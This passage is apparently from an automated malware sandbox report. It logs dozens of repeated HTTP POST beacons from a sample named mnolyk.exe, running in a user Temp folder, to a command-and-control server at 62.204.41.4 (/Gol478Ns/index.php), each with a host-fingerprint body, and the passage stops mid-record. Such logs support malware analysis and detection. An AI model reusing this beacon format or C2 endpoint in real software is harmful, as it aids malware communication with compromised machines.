                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.820897102 CET533INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            345192.168.2.45004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:05.994782925 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.061028004 CET534INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            346192.168.2.45004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:06.234294891 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.303630114 CET535INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            347192.168.2.45004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:06.484997034 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.547944069 CET536INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            348192.168.2.45004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:06.727732897 CET537OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.790538073 CET537INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            349192.168.2.45004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:06.968442917 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.031526089 CET538INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.44973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:35.325342894 CET224OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.389950037 CET224INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            350192.168.2.45004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:07.221259117 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.287579060 CET539INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            351192.168.2.45004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:07.465500116 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.531687021 CET540INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            352192.168.2.45004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:07.710715055 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.773403883 CET541INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            353192.168.2.45004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:07.945990086 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.009577036 CET542INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            354192.168.2.45004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:08.183039904 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.248380899 CET543INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            355192.168.2.45005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:08.417524099 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.483331919 CET544INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            356192.168.2.45005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:08.654161930 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.718580961 CET545INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            357192.168.2.45005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:08.886986971 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.951896906 CET546INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            358192.168.2.45005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:09.121134043 CET547OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.187989950 CET547INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            359192.168.2.45005462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:09.433029890 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.497119904 CET548INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.44973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:35.554583073 CET225OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.618865967 CET225INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            360192.168.2.45005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:09.713047981 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.778923988 CET549INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            361192.168.2.45005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:09.948765039 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.012639046 CET550INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            362192.168.2.45005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:10.183850050 CET551OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.249272108 CET551INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            363192.168.2.45005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:10.419595957 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
